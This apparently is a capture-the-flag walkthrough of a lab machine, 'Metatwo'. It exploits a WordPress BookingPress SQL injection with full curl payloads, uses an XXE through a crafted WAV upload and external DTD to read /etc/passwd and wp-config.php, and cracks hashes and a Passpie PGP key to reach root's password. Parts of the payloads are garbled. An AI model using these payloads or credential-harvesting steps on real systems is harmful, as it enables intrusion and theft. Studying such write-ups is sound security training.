Metatwo

• performed inital nmap scan with default script `nmap -sV -sC` & found 3 open ports (21,22,80) which shows there nginx webserver running which redirects to http://metapress.htb

• added metapress.htb to /etc/hosts file

• perfomed a nmap full tcp scan incase there are other non default open ports `nmap -sV -p-` which were none

• performed nmap scan on port 80 with http-enum script to enumerate common web directores `nmap -sV –script=http-enum` which shows us the following directories:

  80/tcp open http nginx 1.18.0
  |_http-trane-info: Problem with XML parsing of /evox/about
  |http-server-header: nginx/1.18.0
  | http-enum:
  | /wp-login.php: Possible admin folder
  | /wp-json: Possible admin folder
  | /robots.txt: Robots file
  | /.htaccess: Incorrect permissions on .htaccess or .htpasswd files
  | /readme.html: Wordpress version: 2
  | /: WordPress version: 5.6.2
  | /feed/: Wordpress version: 5.6.2
  | /wp-includes/images/rss.png: Wordpress version 2.2 found.
  | /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
  | /wp-includes/images/blank.gif: Wordpress version 2.6 found.
  | /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
  | /wp-login.php: Wordpress login page.
  | /wp-admin/upgrade.php: Wordpress login page.
  | /readme.html: Interesting, a readme.
  | /0/: Potentially interesting folder

• banner grabbing using netcat on port 21 `nc -nv 21` shows us the following

  220 ProFTPD Server (Debian)

• banner grabbing using netccat on port 22 `nc -nv 22` shows us the following

  SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u1

• using whatweb `whatweb ` we confirm that the HTTP server running is nginx 1.18 and we get information about the website http://metapress.htb:

  http://metapress.htb/ [200 OK] Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[nginx/1.18.0],
  IP[10.129.182.75], MetaGenerator[WordPress 5.6.2], PHP[8.0.24], PoweredBy[–], Script,
  Title[MetaPress – Official company site], UncommonHeaders[link], WordPress[5.6.2],
  X-Powered-By[PHP/8.0.24], nginx[1.18.0]

• from running `whatweb` we see that the website is using Wordpress 5.6.2 & PHP 8.0.24

• going through the website we find `/events` page & by looking at source code we see its using a plugin called BookingPress version 1.0.10

• search google for `BookingPress 1.0.10` vulnerabilities we find that’s its vulnerable to unauthetincated SQL Injection (ref: CVE-2022-0739)

• following how to exploit the vulnerability we see that we can get the nonce `65ad7bec42` from page’s source code and invoke a curl command to expoloit it

  curl -i ‘http://metapress.htb/wp-admin/admin-ajax.php‘ –data ‘action=bookingpress_front_get_category_services&_wpnonce=65ad7bec42&category_id=33&total_service=-7502)
  UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6– -‘

• seeing that it works we can now change the query to the following to get the username and password of the admin’s account:

  curl -i ‘http://metapress.htb/wp-admin/admin-ajax.php‘ –data ‘action=bookingpress_front_get_category_services&_wpnonce=65ad7bec42&category_id=33&total_service=-7502)
  UNION ALL SELECT user_login,user_email,user_pass,NULL,NULL,NULL,NULL,NULL,NULL from wp_users limit 1 offset 0– -‘

• changing limit to 2 we also get the manager’s account

• and we get credentials from the results

  {“bookingpress_service_id”:”admin”,”bookingpress_category_id”:”admin@metapress.htb“,”bookingpress_service_name”:”$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.”
  username: admin
  password: $P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.

  username: manager
  password: $P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70

• seeing that the password is hashed, we will now perform `john` to crack the password `john hashedpasswords`

• we were only able to decrypt the manager’s password which was `partylikearockstar`

• when logging it we find a Media Library upload and by search for some information about it on google we see it’s vulnerable to XXE (ref: CVE-2021-29447) which would allows us to upload our payload as WAVE file

• we start by creating our payload `payload.wav`

  echo -en ‘RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00

  %remote;%init;%trick;]>\x00’ > payload.wav

• next we create the file `evil.dtd` file and include our malicious XML with external entity

  “ >

• and now we can start our web server where evil.dtd file sits `python -m http.server` which will run a web server on port 8000

• uploading our payload returns to us a base64 encode and when decoding it we get:

  root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  bin:x:2:2:bin:/bin:/usr/sbin/nologin
  sys:x:3:3:sys:/dev:/usr/sbin/nologin
  sync:x:4:65534:sync:/bin:/bin/sync
  games:x:5:60:games:/usr/games:/usr/sbin/nologin
  man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
  lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
  mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
  news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
  uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
  proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
  www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
  list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
  irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
  gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
  nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
  _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
  systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
  systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
  messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
  sshd:x:104:65534::/run/sshd:/usr/sbin/nologin
  jnelson:x:1000:1000:jnelson,,,:/home/jnelson:/bin/bash
  systemd-timesync:x:999:999:systemd Time Synchronization:/:/usr/sbin/nologin
  systemd-coredump:x:998:998:systemd Core Dumper:/:/usr/sbin/nologin
  mysql:x:105:111:MySQL Server,,,:/nonexistent:/bin/false
  proftpd:x:106:65534::/run/proftpd:/usr/sbin/nologin
  ftp:x:107:65534::/srv/ftp:/usr/sbin/nologin

• we can see we have two users `root` & `jnelson`

• now we’ll update our payload to fetch `../wp-config.php`

  “ >

  +3m?.B/:' ); define( 'SECURE_AUTH_KEY', 'x$i$)b0]b1cup;47`YVua/JHq%*8UA6g]0bwoEW:91EZ9h]rWlVq%IQ66pf{=]a%' ); define( 'LOGGED_IN_KEY', 'J+mxCaP4zdd}EEi%48%JnRq^2MjFiitn#&n+HXv]||E+F~C{qKXy' ); define( 'NONCE_KEY', 'SmeDr$$O0ji;^9]*`~GNe!pX@DvWb4m9Ed=Dd(.r-q{^z(F?)7mxNUg986tQO7O5' ); define( 'AUTH_SALT', '[;TBgc/,M#)d5f[H*tg50ifT?Zv.5Wx=`l@v$-vH*<~:0]s}d<&M;.,x0z~R>3!D' ); define( 'SECURE_AUTH_SALT', '>`VAs6!G955dJs?$O4zm`.Q;amjW^uJrk_1-dI(SjROdW[S&~omiH^jVC?2-I?I.' ); define( 'LOGGED_IN_SALT', '4[fS^3!=%?HIopMpkgYboy8-jl^i]Mw}Y d~N=&^JsI`M)FJTJEVI) N#NOidIf=' ); define( 'NONCE_SALT', '.sU&CQ@IRlh O;5aslY+Fq8QWheSNxd6Ve#}w!Bq,h}V9jKSkTGsv%Y451F8L=bL' ); /** * WordPress Database Table prefix. */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';

• connecting to ftp with the credentials we found for the ftp server, we find a folder called mailer which contains a file `send_email.php` that has the credentials for the user `jnelson`

  $mail->Host = “mail.metapress.htb”;
  $mail->SMTPAuth = true;
  $mail->Username = “jnelson@metapress.htb“;
  $mail->Password = “Cb4_JmWM8zUZWMu@Ys”;
  $mail->SMTPSecure = “tls”;
  $mail->Port = 587;

• using these found credentials for `jnelson` we can now SSH to that user & get the user.txt flag: ed4bbbe6ca2e3b43babc791679126769

• our next step is escalating our privileges to root now

• moving to `/tmp` directory we will upload LinEnum.sh which will scan the system for vulnerabilities and we’ll execute the script – it didn’t find anything useful we can use

• listing directory in our current user’s home directory `ls -lah` we see a .passpie folder, which means they’re using Passpie password manager

• typing `passpie list` we get a the list of users and but their passwords are hidden

  ╒════════╤═════════╤════════════╤═══════════╕
  │ Name │ Login │ Password │ Comment │
  ╞════════╪═════════╪════════════╪═══════════╡
  │ ssh │ jnelson │ ******** │ │
  ├────────┼─────────┼────────────┼───────────┤
  │ ssh │ root │ ******** │ │
  ╘════════╧═════════╧════════════╧═══════════╛

• listing directory `ls -lah` again in the .passpie folder we find .keys file which contains a pgp public & private key

• copying the private key to our machine, we can now use `gpg2john` to crack the key with john `gpg2john private.key > crackme` and now we can use john to crack the password `john crackme –worldlist:/usr/share/wordlists/rockyou.txt`

• after john finishes cracking we get the password which is `blink182`

• going back to the victim’s machine we can now export the passwords in plain text using the passpie’s master password we just cracked `passpie export users`

• and now if we `cat users` we get:

  credentials:

  • comment: ‘’
    fullname: root@ssh
    login: root
    modified: 2022-06-26 08:58:15.621572
    name: ssh
    password: !!python/unicode ‘p7qfAZt4_A1xo_0x’
  • comment: ‘’
    fullname: jnelson@ssh
    login: jnelson
    modified: 2022-06-26 08:58:15.514422
    name: ssh
    password: !!python/unicode ‘Cb4_JmWM8zUZWMu@Ys’
    handler: passpie
    version: 1.0

• now we have root’s password which we can use to get the root’s flag